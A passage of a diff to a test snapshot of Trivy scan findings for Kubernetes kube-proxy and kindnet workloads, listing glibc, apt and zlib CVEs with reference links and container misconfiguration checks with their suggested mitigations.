"https://avd.aquasec.com/nvd/cve-2022-23218", + "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23218", + "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", + "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23219", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23219", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", - "https://linux.oracle.com/cve/CVE-2022-23219.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23219", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23219", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23219", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "value": "https://security.gentoo.org/glsa/202210-42", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", + "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "value": "https://ubuntu.com/security/notices/USN-5355-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-5355-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://ubuntu.com/security/notices/USN-5359-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "value": "https://ubuntu.com/security/notices/USN-5359-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5739-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5111", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", }, { "type": "URL", @@ -156277,972 +156765,1293 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1751", - "installedVersion": "2.28-10", - "packageName": "libc6", + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1751", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", - "https://linux.oracle.com/cve/CVE-2020-1751.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200430-0002/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: array overflow in backtrace functions for powerpc", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1751", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1751", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-proxy' of DaemonSet 'kube-proxy' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(DaemonSet 'kube-proxy' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1752", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1752", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", - "https://linux.oracle.com/cve/CVE-2020-1752.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", - "https://security.gentoo.org/glsa/202101-20", - "https://security.netapp.com/advisory/ntap-20200511-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", ], }, - "category": "Vulnerability", - "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: use-after-free in glob() function when expanding ~user", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1752", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1752", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV017", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv017", + ], + }, + "category": "Misconfiguration", + "description": "Privileged containers share namespaces with the host system and do not offer any security. They should be used exclusively for system containers that require high privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Change 'containers[].securityContext.privileged' to 'false'.", + "name": "Privileged container(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.privileged' to false)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", + "value": "https://avd.aquasec.com/misconfig/ksv017", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsGroup' > 10000)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(DaemonSet 'kube-proxy' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-6096", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "apt", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-6096", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/attachment.cgi?id=12334", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", - "https://ubuntu.com/security/notices/USN-4954-1", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2020-6096", - "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-6096", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-6096", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { 